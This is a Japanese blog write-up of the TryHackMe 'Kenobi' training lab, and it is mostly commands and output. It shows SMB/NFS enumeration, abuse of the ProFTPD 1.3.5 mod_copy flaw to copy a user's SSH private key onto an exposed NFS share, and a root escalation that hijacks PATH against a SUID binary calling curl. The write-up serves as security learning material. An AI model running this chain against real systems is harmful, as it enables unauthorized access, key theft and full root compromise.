【TryHackMe write-up】kenobi

April 30, 2020

はじめに

TryHackMe という Hack the Box のようなサービスを最近やっています。 https://tryhackme.com/

(TryHackMe に関してはブログの方にでもいつかレビューを載せようと思うのでここでは説明を割愛します。)

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

nmap(port scan)

[email protected]:~# nmap -sV -sV 10.10.162.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 15:57 UTC
Nmap scan report for ip-10-10-162-244.eu-west-1.compute.internal (10.10.162.244)
Host is up (0.0012s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
MAC Address: 02:BA:34:C3:7D:40 (Unknown)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.47 seconds

nmap(smbのスキャン)

ファイル共有の一覧を列挙 https://nmap.org/nsedoc/scripts/smb-enum-shares.html

リモートの Windows システム上のユーザーを列挙 https://nmap.org/nsedoc/scripts/smb-enum-users.html

以下のページがわかりやすいかも http://www.byakuya-shobo.co.jp/hj/moh2/pdf/moh2_p120_p131.pdf

[email protected]:~# nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.162.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 16:11 UTC
Nmap scan report for ip-10-10-162-244.eu-west-1.compute.internal (10.10.162.244)
Host is up (0.0027s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 02:BA:34:C3:7D:40 (Unknown)

Host script results:                                                                                                                                                                                                                       
| smb-enum-shares:                                                                                                                                                                                                                         
|   account_used: guest                                                                                                                                                                                                                    
|   \\10.10.162.244\IPC$:                                                                                                                                                                                                                  
|     Type: STYPE_IPC_HIDDEN                                                                                                                                                                                                               
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))                                                                                                                                                                                 
|     Users: 1                                                                                                                                                                                                                             
|     Max Users: <unlimited>                                                                                                                                                                                                               
|     Path: C:\tmp                                                                                                                                                                                                                         
|     Anonymous access: READ/WRITE                                                                                                                                                                                                         
|     Current user access: READ/WRITE                                                                                                                                                                                                      
|   \\10.10.162.244\anonymous:                                                                                                                                                                                                             
|     Type: STYPE_DISKTREE                                                                                                                                                                                                                 
|     Comment:                                                                                                                                                                                                                             
|     Users: 0                                                                                                                                                                                                                             
|     Max Users: <unlimited>                                                                                                                                                                                                               
|     Path: C:\home\kenobi\share                                                                                                                                                                                                           
|     Anonymous access: READ/WRITE                                                                                                                                                                                                         
|     Current user access: READ/WRITE                                                                                                                                                                                                      
|   \\10.10.162.244\print$:                                                                                                                                                                                                                
|     Type: STYPE_DISKTREE                                                                                                                                                                                                                 
|     Comment: Printer Drivers                                                                                                                                                                                                             
|     Users: 0                                                                                                                                                                                                                             
|     Max Users: <unlimited>                                                                                                                                                                                                               
|     Path: C:\var\lib\samba\printers                                                                                                                                                                                                      
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds

[email protected]:~# nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.162.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 16:17 UTC
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 50.00% done; ETC: 16:17 (0:00:01 remaining)
Nmap scan report for ip-10-10-162-244.eu-west-1.compute.internal (10.10.162.244)
Host is up (0.00019s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
MAC Address: 02:BA:34:C3:7D:40 (Unknown)

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.162.244\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.162.244\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.162.244\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds

smbclient

smbclient - サーバー上の SMB/CIFS リソースにアクセスする

ftp みたいなコマンドですね

[email protected]:~# smbclient //10.10.162.244/anonymous
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 10:49:09 2019
  ..                                  D        0  Wed Sep  4 10:56:07 2019
  log.txt                             N    12237  Wed Sep  4 10:49:09 2019

                9204224 blocks of size 1024. 6877112 blocks available

smbget

smbget - SMB 経由でファイルをダウンロード

[email protected]:~# smbget -R smb://10.10.162.244/anonymous
Password for [root] connecting to //anonymous/10.10.162.244: 
Using workgroup WORKGROUP, user root
smb://10.10.162.244/anonymous/log.txt                                                                                                                                                                                                      
Downloaded 11.95kB in 2 seconds

nmap

https://nmap.org/nsedoc/scripts/nfs-ls.html https://nmap.org/nsedoc/scripts/nfs-showmount.html https://nmap.org/nsedoc/scripts/nfs-statfs.html

[email protected]:~# nmap -p 111 -script=nfs-ls,nfs-statfs,nfs-showmount 10.10.162.244
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 17:18 UTC
Nmap scan report for ip-10-10-162-244.eu-west-1.compute.internal (10.10.162.244)
Host is up (0.00017s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount: 
|_  /var *
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836520.0  6877108.0  22%   16.0T        32000
MAC Address: 02:BA:34:C3:7D:40 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

searchsploit

[email protected]:~# searchsploit ProFTPD 1.3.5                                                                                                                                                                                                    
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                                                                                                         | exploits/linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                                                                                               | exploits/linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                                                                                                                                                         | exploits/linux/remote/36742.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

‘mod_copy’の脆弱性を使用します

https://scan.netsecurity.ne.jp/article/2015/07/13/36847.html

exploit

[email protected]:~# nc 10.10.217.211 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.217.211]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

これで/var/tmp 内に ssh の鍵がコピーされました

ssh鍵を取得してuser.txtをとる

[email protected]:~# mkdir /mnt/kenobiNFS
[email protected]:~# mount 10.10.217.211:/var /mnt/kenobiNFS
[email protected]:~# ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root    4096 Sep  4  2019 .
drwxr-xr-x  3 root root    4096 Apr 30 06:54 ..
drwxr-xr-x  2 root root    4096 Sep  4  2019 backups
drwxr-xr-x  9 root root    4096 Sep  4  2019 cache
drwxrwxrwt  2 root root    4096 Sep  4  2019 crash
drwxr-xr-x 40 root root    4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff   4096 Apr 12  2016 local
lrwxrwxrwx  1 root root       9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail    4096 Feb 26  2019 mail
drwxr-xr-x  2 root root    4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root       4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root    4096 Jan 29  2019 snap
drwxr-xr-x  5 root root    4096 Sep  4  2019 spool
drwxrwxrwt  6 root root    4096 Apr 30 06:49 tmp
drwxr-xr-x  3 root root    4096 Sep  4  2019 www

これで user.txt が取れます

privilege escalation

SUID なファイルを探します

[email protected]:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

/usr/bin/menu なんて普通ありますっけ?

menu

menu のコマンドを試しに使ってみます

[email protected]:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2020 07:28:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html

こんな感じです

menuのバイナリをみてみる

[email protected]:~$ strings /usr/bin/menu

(省略)

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice

(省略)

menu では内部で curl が実行されています

curlをすり替えてPE

[email protected]:~$ echo /bin/sh > /tmp/curl
[email protected]:~$ chmod 777 /tmp/curl
[email protected]:~$ export PATH=/tmp:$PATH
[email protected]:~$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
[email protected]:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# cat /root/root.txt

root.txt が取れました

終わりに

最後の curl を置き換えるところとか頭いいなって思いました(僕は知らなかったけど割とありがちな手法なんですかね?)

TryHackMe の Vip1 ヶ月で終わらせたいので頑張ります

このエントリーをはてなブックマークに追加